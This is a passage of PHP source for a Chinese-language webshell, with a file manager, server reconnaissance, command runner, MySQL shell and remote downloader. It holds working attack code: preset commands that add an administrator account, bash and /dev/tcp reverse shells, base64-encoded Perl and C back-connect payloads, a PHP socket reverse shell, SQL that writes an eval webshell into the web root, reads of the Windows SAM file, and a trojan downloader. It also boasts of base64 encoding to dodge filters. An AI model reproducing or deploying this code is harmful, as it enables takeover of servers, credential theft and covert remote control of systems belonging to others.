                $it = substr($filepath, -3);
                html_n('<tr height="25"><td><input type="checkbox" name="files[]" value="' . $files . '">');
                html_img(css_showimg($files));
                html_a($Fileurls, $files, 'target="_blank"');
                html_n('</td><td align="center">');
                if (($it == '.gz') or ($it == 'zip') or ($it == 'tar') or ($it == '.7z')) {
                    html_a("?type=1&unzip=" . $filepath, "Z解1", 'title="手写的PHP解压' . $files . "\" onClick=\"rusurechk('" . $todir . "','?tt=1&unzip=" . $filepath . '&todir=\');return false;"');
                    html_a("?type=2&unzip=" . $filepath, "Z解2", 'title="PHP自带的ZIP解压' . $files . "\" onClick=\"rusurechk('" . $todir . "','?tt=2&unzip=" . $filepath . '&todir=\');return false;"');
                    html_a("?type=3&unzip=" . $filepath, "T解", 'title="PHP自带的tar解压' . $files . ',针对LINUX文件属性权限用,比如0777,0755" onClick="rusurechk(\'' . $todir . "','?tt=3&unzip=" . $filepath . '&todir=\');return false;"');
                } else {
                    html_a("?eanver=editr&p=" . $filepath, "编辑", "title=\"编辑" . $files . '"');
                }
                html_n("<a href=\"#\" onClick=\"rusurechk('" . $files . "','?eanver=rename&p=" . $filepath . "&newname=');return false;\">改名</a> <a href=\"#\" onClick=\"rusuredel('" . $files . "','?eanver=del&p=" . $filepath . "');return false;\">删除</a> <a href=\"#\" onClick=\"rusurechk('" . urldecode($filepath) . "','?eanver=copy&p=" . $filepath . "&newcopy=');return false;\">复制</a></td><td align=\"center\"><a href=\"javascript:SubmitAttran('修改所选文件属性为:','" . $files . "','" . $perm . "','c');\"  title='修改属性'>" . $perm . "</a></td><td align=\"center\">" . GetFileOwner("$path/$files") . ':' . GetFileGroup("$path/$files"));
                html_n("</td><td align='center'><a href=\"javascript:SubmitAttran('修改所选文件时间为:','" . $files . "','" . $filetime . "','d');\"  title='修改时间'>" . $filetime . "</a></td><td align='right'>");
                html_a("?down=" . $filepath, $fsize, "title=\"下载" . $files . '"');
                html_n("</td></tr>");
                $NUM_F++;
            }
        }
        @$dir->close();
        $Filetime = gmdate('Y-m-d H:i:s', time() + 3600 * 8);
        html_n("</table>
<div class=\"actall\"> <input type=\"hidden\" id=\"actall\" name=\"actall\" value=\"\">
<input type=\"hidden\" id=\"attam\" name=\"attam\" value=\"\">
<input type=\"hidden\" id=\"inver\" name=\"inver\" value=\"undefined\">
<input type=\"hidden\" id=\"file\" name=\"file\" value=\"undefined\">
<input name=\"chkall\" value=\"on\" type=\"checkbox\" onclick=\"CheckAll(this.form);\">
<input type=\"button\" value=\"复制\" onclick=\"SubmitUrl('复制所选文件到路径: ','" . $REAL_DIR . "','a');return false;\">
<input type=\"button\" value=\"删除\" onclick=\"Delok('所选文件','b');return false;\">
<input type=\"button\" value=\"属性\" onclick=\"SubmitUrl('修改所选文件属性值为: ','0666','c');return false;\">
<input type=\"button\" value=\"时间\" onclick=\"CheckDate('" . $Filetime . "','d');return false;\">
<input type=\"button\" value=\"打包\" onclick=\"SubmitUrl('打包并下载所选文件下载名为: ','" . $path . '/' . $_SERVER['SERVER_NAME'] . ".tar.gz','e');return false;\">
目录(" . $NUM_D . ") / 文件(" . $NUM_F . ")</div>
</form> ");
        break;
    case "editr":
        echo("<script>");
        html_base();
        echo("</script>");
        css_js("2");
        if (!empty($_POST['uploadt'])) {
            echo @copy($_FILES['upfilet']['tmp_name'], str_path($p . '/' . $_FILES['upfilet']['name'])) ? html_a("?eanver=main", $_FILES['upfilet']['name'] . ' ' . $msg[2]) : msg($msg[3]);
            die("<meta http-equiv=\"refresh\" content=\"1;URL=?eanver=main&path=" . urlencode($p) . '">');
        }
        if (!empty($_GET['redir'])) {
            $name = $_GET['name'];
            $newdir = str_path($p . '/' . $name);
            @mkdir($newdir, 0777) ? html_a("?eanver=main", $name . ' ' . $msg[0]) : msg($msg[1]);
            die("<meta http-equiv=\"refresh\" content=\"1;URL=?eanver=main&path=" . urlencode($p) . '">');
        }
        if (!empty($_GET['refile'])) {
            $name = $_GET['name'];
            $jspath = urlencode($p . '/' . $name);
            $pp = urlencode($p);
            $p = str_path($p . '/' . $name);
            $FILE_CODE = "";
            $charset = 'GB2312';
            $FILE_TIME = date('Y-m-d H:i:s', time() + 3600 * 8);
            if (@file_exists($p)) echo "发现目录下有\"同名\"文件,更换编码可以截入<br>";
        } else {
            $jspath = urlencode($p);
            $FILE_TIME = date('Y-m-d H:i:s', filemtime($p));
            //$FILE_CODE = implode('', @file($p));
            $FILE_CODE = file_get_contents($p);
            if (substr(PHP_VERSION, 0, 1) >= 5) {
                if (empty($_GET['charset'])) {
                    if (TestUtf8($FILE_CODE) > 1) {
                        $charset = 'UTF-8';
                        $FILE_CODE = iconv("UTF-8", "gb2312//IGNORE", $FILE_CODE);
                    } else {
                        $charset = 'GB2312';
                    }
                } else {
                    if ($_GET['charset'] == 'GB2312') {
                        $charset = 'GB2312';
                    } else {
                        $charset = $_GET['charset'];
                        $FILE_CODE = iconv($_GET['charset'], "gb2312//IGNORE", $FILE_CODE);
                    }
                }
            }
            $FILE_CODE2 = $FILE_CODE;
            $FILE_CODE = htmlspecialchars($FILE_CODE);
            if ($FILE_CODE == "") {
                $FILE_CODE = htmlspecialchars($FILE_CODE2, ENT_COMPAT, 'ISO-8859-1');
            }
        }
        html_n("<div class=\"actall\">查找内容: <input name=\"searchs\" type=\"text\" value=\"\" style=\"width:500px;\">
<input type=\"button\" value=\"查找\" onclick=\"search(searchs.value)\"></div>
<form method='POST' id=\"editor\"  action='?eanver=main&path=" . $pp . "'>
<div class=\"actall\">
<input type=\"text\" name=\"newfile\"  id=\"newfile\" value=\"" . $p . "\" style=\"width:750px;\">指定编码：<input name=\"charset\" id=\"charset\" value=\"" . $charset . "\" Type=\"text\" style=\"width:80px;\" onkeydown=\"if(event.keyCode==13)window.location='?eanver=editr&p=" . $jspath . "&charset='+this.value;\">
<input type=\"button\" value=\"选择\" onclick=\"window.location='?eanver=editr&p=" . $jspath . "&charset='+this.form.charset.value;\" style=\"width:50px;\">");
        html_select(array("GB2312" => "GB2312", "UTF-8" => "UTF-8", "BIG5" => "BIG5", "EUC-KR" => "EUC-KR", "EUC-JP" => "EUC-JP", "SHIFT-JIS" => "SHIFT-JIS", "WINDOWS-874" => "WINDOWS-874", "ISO-8859-1" => "ISO-8859-1"), $charset, "onchange=\"window.location='?eanver=editr&p={$jspath}&charset='+options[selectedIndex].value;\"");
        html_n("</div>
<div class=\"actall\"><textarea name=\"txt\" id=\"txt\" style=\"width:100%;height:380px;\">" . $FILE_CODE . "</textarea></div>
<div class=\"actall\">文件修改时间 <input type=\"text\" name=\"time\" id=\"mtime\" value=\"" . $FILE_TIME . "\" style=\"width:150px;\"> <input type=\"checkbox\" name=\"bin\" value=\"wb+\" size=\"\" checked>以二进制形式保存文件(建议使用)</div>
<div class=\"actall\"><input type=\"button\" value=\"保存\" onclick=\"CheckDate();\" style=\"width:80px;\"><input name='reset' type='reset' value='重置'>
<input type=\"button\" value=\"返回\" onclick=\"window.location='?eanver=main&path=" . $pp . "';\" style=\"width:80px;\"></div>
</form>");
        break;
    case "rename":
        html_n("<tr><td>");
        $newname = urldecode($pp) . '/' . urlencode($_GET['newname']);
        @rename($p, $newname) ? html_a("?eanver=main&path=$pp", urlencode($_GET['newname']) . ' ' . $msg[4]) : msg($msg[5]);
        die("<meta http-equiv=\"refresh\" content=\"1;URL=?eanver=main&path=" . $pp . '">');
        break;
    case "deltree":
        html_n("<tr><td>");
        delDirAndFile($p);
        !is_dir($p) ? html_a("?eanver=main&path=$pp", $p . ' ' . $msg[6]) : msg($msg[7]);
        die("<meta http-equiv=\"refresh\" content=\"1;URL=?eanver=main&path=" . $pp . '">');
        break;
    case "del":
        html_n("<tr><td>");
        delDirAndFile($p);
        !is_file($p) ? html_a("?eanver=main&path=$pp", $p . ' ' . $msg[6]) : msg($msg[7]);
        die("<meta http-equiv=\"refresh\" content=\"1;URL=?eanver=main&path=" . $pp . '">');
        break;
    case "copy":
        html_n("<tr><td>");
        $newpath = explode('/', $_GET['newcopy']);
        $pathr[0] = $newpath[0];
        for ($i = 1; $i < count($newpath); $i++) {
            $pathr[] = urlencode($newpath[$i]);
        }
        $newcopy = implode('/', $pathr);
        @copy($p, $newcopy) ? html_a("?eanver=main&path=$pp", $newcopy . ' ' . $msg[4]) : msg($msg[5]);
        die("<meta http-equiv=\"refresh\" content=\"1;URL=?eanver=main&path=" . $pp . '">');
        break;
    case "perm":
        html_n("<form method='POST'><tr><td>" . $p . " 属性为: ");
        if (is_dir($p)) {
            html_select(array("0777" => "0777", "0755" => "0755", "0555" => "0555"), $_GET['chmod']);
        } else {
            html_select(array("0666" => "0666", "0644" => "0644", "0444" => "0444"), $_GET['chmod']);
        }
        html_input("submit", "save", "修改");
        back();
        if ($_POST['class']) {
            switch ($_POST['class']) {
                case "0777":
                    $change = @chmod($p, 0777);
                    break;
                case "0755":
                    $change = @chmod($p, 0755);
                    break;
                case "0555":
                    $change = @chmod($p, 0555);
                    break;
                case "0666":
                    $change = @chmod($p, 0666);
                    break;
                case "0644":
                    $change = @chmod($p, 0644);
                    break;
                case "0444":
                    $change = @chmod($p, 0444);
                    break;
            }
            $change ? html_a("?eanver=main&path=$pp", $msg[4]) : msg($msg[5]);
            die("<meta http-equiv=\"refresh\" content=\"1;URL=?eanver=main&path=" . $pp . '">');
        }
        html_n("</td></tr></form>");
        break;
    case "info_f":
        $dis_func = get_cfg_var("disable_functions");
        $upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "不允许上传";
        if ($dis_func == "") {
            $dis_func = "No";
        } else {
            $dis_func = str_replace(" ", "<br>", $dis_func);
            $dis_func = str_replace(",", "<br>", $dis_func);
        }
        $phpinfo = (!preg_match("/phpinfo/", $dis_func)) ? "Yes" : "No";
        $info = array(array("服务器时间", date("Y-m-d h:i:s", time())), array("服务器域名", "<a href=\"http://" . $_SERVER['SERVER_NAME'] . "\" target=\"_blank\">" . $_SERVER['SERVER_NAME'] . "</a>"), array("服务器IP地址", gethostbyname($_SERVER['SERVER_NAME'])), array("服务器操作系统", PHP_OS), array("服务器操作系统文字编码", $_SERVER['HTTP_ACCEPT_LANGUAGE']), array("服务器解译引擎", $_SERVER['SERVER_SOFTWARE']), array("你的IP", get_proxy_ip()), array("Web服务端口", $_SERVER['SERVER_PORT']), array("PHP运行方式", strtoupper(php_sapi_name())), array("PHP版本", PHP_VERSION), array("运行于安全模式", Info_Cfg("safemode")), array("本文件路径", myaddress), array("允许使用 URL 打开文件 allow_url_fopen", Info_Cfg("allow_url_fopen")), array("允许使用curl_exec", Info_Fun("curl_exec")), array("允许动态加载链接库 enable_dl", Info_Cfg("enable_dl")), array("显示错误信息 display_errors", Info_Cfg("display_errors")), array("自动定义全局变量 register_globals", Info_Cfg("register_globals")), array("magic_quotes_gpc", Info_Cfg("magic_quotes_gpc")), array("程序最多允许使用内存量 memory_limit", Info_Cfg("memory_limit")), array("POST最大字节数 post_max_size", Info_Cfg("post_max_size")), array("允许最大上传文件 upload_max_filesize", $upsize), array("程序最长运行时间 max_execution_time", Info_Cfg("max_execution_time") . "秒"), array("被禁用的函数 disable_functions", $dis_func), array("phpinfo()", $phpinfo), array("目前还有空余空间diskfreespace", intval(diskfreespace(".") / (1024 * 1024)) . 'Mb'), array("图形处理 GD Library", Info_Fun("imageline")), array("IMAP电子邮件系统", Info_Fun("imap_close")), array("MySQL数据库", Info_Fun("mysql_close")), array("SyBase数据库", Info_Fun("sybase_close")), array("Oracle数据库", Info_Fun("ora_close")), array("Oracle 8 数据库", Info_Fun("OCILogOff")), array("PREL相容语法 PCRE", Info_Fun("preg_match")), array("PDF文档支持", Info_Fun("pdf_close")), array("Postgre SQL数据库", Info_Fun("pg_close")), array("SNMP网络管理协议", Info_Fun("snmpget")), array("压缩文件支持(Zlib)", Info_Fun("gzclose")), array("XML解析", Info_Fun("xml_set_object")), array("FTP", Info_Fun("ftp_login")), array("ODBC数据库连接", Info_Fun("odbc_close")), array("Session支持", Info_Fun("session_start")), array("Socket支持", Info_Fun("fsockopen")),);
        $shell = new COM("WScript.Shell") or die("This thing requires Windows Scripting Host");
        echo "<table width=\"100%\" border=\"0\">";
        for ($i = 0; $i < count($info); $i++) {
            echo "<tr><td width=\"40%\">" . $info[$i][0] . "</td><td>" . $info[$i][1] . "</td></tr>" . "\n";
        }
        $registry_proxystring = "";
        $Telnet = "";
        $PcAnywhere = "";
        try {
            $registry_proxystring = $shell->RegRead("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\\PortNumber");
            $Telnet = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\TelnetServer\\1.0\\TelnetPort");
            $PcAnywhere = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Symantec\\pcAnywhere\\CurrentVersion\\System\\TCPIPDataPort");
        } catch (Exception $e) {
        }
        echo "<tr><td width=\"40%\">Terminal Service端口为</td><td>" . $registry_proxystring . "</td></tr>" . "\n";
        echo "<tr><td width=\"40%\">Telnet端口为</td><td>" . $Telnet . "</td></tr>" . "\n";
        echo "<tr><td width=\"40%\">PcAnywhere端口为</td><td>" . $PcAnywhere . "</td></tr>" . "\n";
        echo "</table>";
        break;
    case "cmd":
        $res = "回显窗口";
        $cmd = "whoami";
        if (!empty($_POST['cmd'])) {
            $res = Exec_Run(base64_decode($_POST['cmd']));
            $cmd = htmlspecialchars(base64_decode($_POST['cmd']));
        }
        html_n("<script language=\"javascript\">
function sFull(i){
	Str = new Array(11);
	Str[0] = \"dir\";
	Str[1] = \"net user envl envl /add\";
	Str[2] = \"net localgroup administrators envl /add\";
	Str[3] = \"netstat -ano\";
	Str[4] = \"ipconfig\";
	Str[5] = \"copy c:\\1.php d:\\2.php\";
	Str[6] = \"tftp -i " . $_SERVER["REMOTE_ADDR"] . "get server.exe c:\\server.exe\";
	Str[7] = \"0<&123;exec 123<>/dev/tcp/" . $_SERVER["REMOTE_ADDR"] . "/12666; sh <&123 >&123 2>&123\";
	Str[8] = \"bash -i >& /dev/tcp/" . $_SERVER["REMOTE_ADDR"] . "/12366 0>&1\";
	Str[9] = \"tasklist -svc\";
	Str[10] = \"netstat -tlnp\";
	document.getElementById('cmd').value = Str[i];
	return true;
}");
        html_base();
        html_n("function SubmitUrl(){
			document.getElementById('cmd').value = base64encode(document.getElementById('cmd').value);
			document.getElementById('gform').submit();
}
</script>
<form method=\"POST\" name=\"gform\" id=\"gform\" ><center><div class=\"actall\">执行命令新增很多隐藏函数，这个执行不了，除了反弹出来，绝对没有任何工具能执行命令！外加使用BASE64加密提交，防止被拦</div><div class=\"actall\">
命令参数 <input type=\"text\" name=\"cmd\" id=\"cmd\" value=\"" . $cmd . "\" onkeydown=\"if(event.keyCode==13)SubmitUrl();\" style=\"width:399px;\">
<select onchange='return sFull(options[selectedIndex].value)'>
<option value=\"0\" selected>--命令集合--</option>
<option value=\"1\">添加管理员</option>
<option value=\"2\">设为管理组</option>
<option value=\"3\">查看端口</option>
<option value=\"4\">查看地址</option>
<option value=\"5\">复制文件</option>
<option value=\"6\">FTP下载</option>
<option value=\"7\">Linux反弹</option>
<option value=\"8\">bash反弹</option>
<option value=\"9\">查看进程</option>
<option value=\"10\">Linux端口</option>
</select>
	<input type=\"button\" value=\"执行\" onclick=\"SubmitUrl();\" style=\"width:80px;\">
</div>
<div class=\"actall\"><textarea name=\"show\" style=\"width:660px;height:399px;\">" . $res . "</textarea></div></center>
</form>");
        break;
    case "linux":
        $yourip = isset($_COOKIE['yourip']) ? $_COOKIE['yourip'] : getenv('REMOTE_ADDR');
        $yourport = isset($_COOKIE['yourport']) ? $_COOKIE['yourport'] : "12388";
        $system = strtoupper(substr(PHP_OS, 0, 3));
        html_n("<div class=\"actall\">使用方法：<br>
			先在自己电脑运行\"nc -vv -l 12388\"<br>
			然后在此填写你电脑的IP,点连接！此反弹很全很实用！包括NC反弹！</div>
<form method=\"POST\" name=\"kform\" id=\"kform\">
<div class=\"actall\">你的地址 <input type=\"text\" name=\"yourip\" value=\"" . $yourip . "\" style=\"width:400px\"></div>
<div class=\"actall\">连接端口 <input type=\"text\" name=\"yourport\" value=\"" . $yourport . "\" style=\"width:400px\"></div>
<div class=\"actall\">执行方式 <select name=\"use\" >
<option value=\"perl\">Perl</option>
<option value=\"c\">C</option>
<option value=\"php\">PHP</option>
<option value=\"nc\">NC</option>
</select></div>
<div class=\"actall\"><input type=\"submit\" value=\"开始连接\" style=\"width:80px;\"></div></form>");
        if ((!empty($_POST['yourip'])) && (!empty($_POST['yourport']))) {
            setcookie('yourip', $_POST['yourip']);
            setcookie('yourport', $_POST['yourport']);
            echo "<div class=\"actall\">";
            if ($_POST['use'] == 'perl') {
                $back_connect_pl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj" . "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR" . "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT" . "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI" . "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi" . "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl" . "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
                echo File_Write("/tmp/envl_bc", base64_decode($back_connect_pl), 'wb') ? "创建/tmp/envl_bc成功<br>" : "创建/tmp/envl_bc失败<br>";
                $perlpath = Exec_Run('which perl');
                $perlpath = $perlpath ? chop($perlpath) : 'perl';
                @unlink("/tmp/envl_bc.c");
                echo Exec_Run($perlpath . " /tmp/envl_bc " . $_POST['yourip'] . ' ' . $_POST['yourport'] . ' &') ? "nc -vv -l " . $_POST['yourport'] : "执行命令失败";
            }
            if ($_POST['use'] == 'c') {
                $back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC" . "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb" . "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd" . "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ" . "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC" . "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D" . "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp" . "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
                echo File_Write("/tmp/envl_bc.c", base64_decode($back_connect_c), 'wb') ? "创建/tmp/envl_bc.c成功<br>" : "创建/tmp/envl_bc.c失败<br>";
                $res = Exec_Run("gcc -o /tmp/envl_bc /tmp/envl_bc.c");
                @unlink("/tmp/envl_bc.c");
                echo Exec_Run("/tmp/envl_bc " . $_POST['yourip'] . ' ' . $_POST['yourport'] . ' &') ? "nc -vv -l " . $_POST['yourport'] : "执行命令失败";
            }
            if ($_POST['use'] == 'php') {
                if (!extension_loaded('sockets')) {
                    if ($system == 'WIN') {
                        @dl('php_sockets.dll') or die("Can't load socket");
                    } else {
                        @dl('sockets.so') or die("Can't load socket");
                    }
                }
                if ($system == "WIN") {
                    $env = array('path' => " ");
                } else {
                    $env = array('PATH' => " ");
                }
                $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
                $host = $_POST['yourip'];
                $port = $_POST['yourport'];
                $host = gethostbyname($host);
                $proto = getprotobyname("tcp");
                if (($sock = socket_create(AF_INET, SOCK_STREAM, $proto)) < 0) {
                    die("Socket创建失败");
                }
                if (($ret = socket_connect($sock, $host, $port)) < 0) {
                    die("连接失败");
                } else {
                    $message = "----------------------PHP反弹连接----------------------" . "\n";
                    socket_write($sock, $message, strlen($message));
                    $cwd = str_replace('\\', '/', dirname(__FILE__));
                    while ($cmd = socket_read($sock, 65535, $proto)) {
                        if (trim(strtolower($cmd)) == "exit") {
                            socket_write($sock, "Bye\n");
                            exit;
                        } else {
                            $process = proc_open($cmd, $descriptorspec, $pipes, $cwd, $env);
                            if (is_resource($process)) {
                                fwrite($pipes[0], $cmd);
                                fclose($pipes[0]);
                                $msg = stream_get_contents($pipes[1]);
                                socket_write($sock, $msg, strlen($msg));
                                fclose($pipes[1]);
                                $msg = stream_get_contents($pipes[2]);
                                socket_write($sock, $msg, strlen($msg));
                                $return_value = proc_close($process);
                            }
                        }
                    }
                }
            }
            if ($_POST['use'] == 'nc') {
                echo "<div class=\"actall\">";
                $mip = $_POST['yourip'];
                $bport = $_POST['yourport'];
                $fp = fsockopen($mip, $bport, $errno, $errstr);
                if (!$fp) {
                    $result = "Error: could not open socket connection";
                } else {
                    fputs($fp, "\n*********************************************\n " . "is ok" . "\n*********************************************\n\n");
                    while (!feof($fp)) {
                        fputs($fp, " [root@baidu.com:/root]# ");
                        $result = fgets($fp, 4096);
                        $message = `$result`;
                        fputs($fp, "--> " . $message . "\n");
                    }
                    fclose($fp);
                }
                echo "</div>";
            }
            echo "<br>你可以尝试连接端口 (nc -vv -l " . $_POST['yourport'] . ') ';
        }
        break;
    case "sqlshell":
        $MSG_BOX = '';
        $mhost = 'localhost';
        $muser = 'root';
        $mport = '3306';
        $mpass = '';
        $mdata = 'mysql';
        $msql = "select version();";
        if (isset($_POST['mhost']) && isset($_POST['muser'])) {
            $mhost = $_POST['mhost'];
            $muser = $_POST['muser'];
            $mpass = $_POST['mpass'];
            $mdata = $_POST['mdata'];
            $mport = $_POST['mport'];
            if ($conn = @mysql_connect($mhost . ':' . $mport, $muser, $mpass)) @mysql_select_db($mdata); else $MSG_BOX = "连接MYSQL失败";
        }
        $downfile = "c:/windows/repair/sam";
        if (!empty($_POST['downfile'])) {
            $downfile = File_Str($_POST['downfile']);
            $binpath = bin2hex($downfile);
            $query = "select load_file(0x" . $binpath . ')';
            if ($result = @mysql_query($query, $conn)) {
                $k = 0;
                $downcode = '';
                while ($row = @mysql_fetch_array($result)) {
                    $downcode .= $row[$k];
                    $k++;
                }
                $filedown = basename($downfile);
                if (!$filedown) $filedown = "envl.tmp";
                $array = explode('.', $filedown);
                $arrayend = array_pop($array);
                header("Content-type: application/x-" . $arrayend);
                header("Content-Disposition: attachment; filename=" . $filedown);
                header("Content-Length: " . strlen($downcode));
                echo $downcode;
                exit;
            } else $MSG_BOX = "下载文件失败";
        }
        $o = isset($_GET['o']) ? $_GET['o'] : '';
        html_n("<script language=\"javascript\">
function nFull(i){
	Str = new Array(11);
	Str[0] = \"select version();\";
	Str[1] = \"select load_file() FROM user into outfile '" . str_replace('\\', '/', $_SERVER['DOCUMENT_ROOT']) . "/iis.txt'\";
	Str[2] = \"select '<?php eval(\$_POST['cmd']);?>' into outfile '" . str_replace('\\', '/', $_SERVER['DOCUMENT_ROOT']) . "/shell.php';\";
	Str[3] = \"GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;\";
	nform.msql.value = Str[i];
	return true;
}");
        html_base();
        html_n("function SubmitUrl(){
			document.getElementById('msql').value = base64encode(document.getElementById('msql').value);
			document.getElementById('nform').submit();
}
</script>
<form method=\"POST\" name=\"nform\" id=\"nform\">
<center><div class=\"actall\"><a href=\"?eanver=sqlshell\">[MYSQL执行语句]</a>
<a href=\"?eanver=sqlshell&o=u\">[MYSQL上传文件]</a>
<a href=\"?eanver=sqlshell&o=d\">[MYSQL下载文件]</a></div>
<div class=\"actall\">
地址 <input type=\"text\" name=\"mhost\" value=\"" . $mhost . "\" style=\"width:110px\">
端口 <input type=\"text\" name=\"mport\" value=\"" . $mport . "\" style=\"width:110px\">
用户 <input type=\"text\" name=\"muser\" value=\"" . $muser . "\" style=\"width:110px\">
密码 <input type=\"text\" name=\"mpass\" value=\"" . $mpass . "\" style=\"width:110px\">
库名 <input type=\"text\" name=\"mdata\" value=\"" . $mdata . "\" style=\"width:110px\">
</div>
<div class=\"actall\" style=\"height:220px;\">");
        if ($o == 'u') {
            $uppath = " ";
            if (!empty($_POST['uppath'])) {
                $uppath = $_POST['uppath'];
                $query = "Create TABLE a (cmd text NOT NULL);";
                if (@mysql_query($query, $conn)) {
                    if ($tmpcode = File_Read($_FILES['upfile']['tmp_name'])) {
                        $filecode = bin2hex(File_Read($tmpcode));
                    } else {
                        $tmp = File_Str(dirname(myaddress)) . "/upfile.tmp";
                        if (File_Up($_FILES['upfile']['tmp_name'], $tmp)) {
                            $filecode = bin2hex(File_Read($tmp));
                            @unlink($tmp);
                        }
                    }
                    $query = "Insert INTO a (cmd) VALUES(CONVERT(0x" . $filecode . ",CHAR));";
                    if (@mysql_query($query, $conn)) {
                        $query = "SELECT cmd FROM a INTO DUMPFILE '" . $uppath . "';";
                        $MSG_BOX = @mysql_query($query, $conn) ? "上传文件成功" : "上传文件失败";
                    } else $MSG_BOX = "插入临时表失败";
                    @mysql_query("Drop TABLE IF EXISTS a;", $conn);
                } else $MSG_BOX = "创建临时表失败";
            }
            html_n("<br><br>上传路径 <input type=\"text\" name=\"uppath\" value=\"" . $uppath . "\" style=\"width:500px\">
<br><br>选择文件 <input type=\"file\" name=\"upfile\" style=\"width:500px;height:22px;\">
</div><div class=\"actall\"><input type=\"submit\" value=\"上传\" style=\"width:80px;\">");
        } elseif ($o == 'd') {
            html_n("<br><br><br>下载文件 <input type=\"text\" name=\"downfile\" value=\"" . $downfile . "\" style=\"width:500px\">
</div><div class=\"actall\"><input type=\"submit\" value=\"下载\" style=\"width:80px;\">");
        } else {
            if (!empty($_POST['msql'])) {
                $msql = $_POST['msql'];
                $msql = base64_decode($msql);
                if ($result = @mysql_query($msql, $conn)) {
                    $MSG_BOX = "执行SQL语句成功<br>";
                    $k = 0;
                    while ($row = @mysql_fetch_array($result)) {
                        $MSG_BOX .= $row[$k];
                        $k++;
                    }
                } else $MSG_BOX .= "：" . @mysql_error();
            }
            html_n("<textarea name=\"msql\" id=\"msql\" style=\"width:700px;height:200px;\">" . $msql . "</textarea></div>
<div class=\"actall\">
<select onchange=\"return nFull(options[selectedIndex].value)\">
	<option value=\"0\" selected>显示版本</option>
	<option value=\"1\">导出文件</option>
	<option value=\"2\">写入文件</option>
	<option value=\"3\">开启外连</option>
</select>
<input type=\"button\" value=\"执行\" onclick=\"SubmitUrl();\" style=\"width:80px;\">");
        }
        if ($MSG_BOX != '') echo "</div><div class=\"actall\">" . $MSG_BOX . "</div></center></form>"; else echo "</div></center></form>";
        break;
    case "downloader":
        $Com_durl = isset($_POST['durl']) ? $_POST['durl'] : "http://" . getenv('REMOTE_ADDR') . "/down/muma.exe";
        $Com_dpath = isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(myaddress) . "/muma.exe");
        html_n("<form method=\"POST\">
    <div class=\"actall\">超连接 <input name=\"durl\" value=\"" . $Com_durl . "\" type=\"text\" style=\"width:600px;\"></div>
    <div class=\"actall\">下载到 <input name=\"dpath\" value=\"" . $Com_dpath . "\" type=\"text\" style=\"width:600px;\"></div>
    <div class=\"actall\"><input value=\"下载\" type=\"submit\" style=\"width:80px;\"></div></form>");
        if ((!empty($_POST['durl'])) && (!empty($_POST['dpath']))) {
            echo "<div class=\"actall\">";
            $contents = @implode('', @file($_POST['durl']));
            if (!$contents) echo "无法读取要下载的数据"; else echo File_Write($_POST['dpath'], $contents, 'wb') ? "下载文件成功" : "下载文件失败";
            echo "</div>";
        }
        break;
    case "upfiles":
        html_n("<tr><td>服务器限制上传单个文件大小: " . @get_cfg_var('upload_max_filesize') . "<form method=\"POST\" enctype=\"multipart/form-data\">");
        html_input("text", "uppath", root_dir, "<br>上传到路径: ", "51");
        html_n("<SCRIPT language=\"JavaScript\">
function addTank(){
var k=0;
  k=k+1;
  k=tank.rows.length;
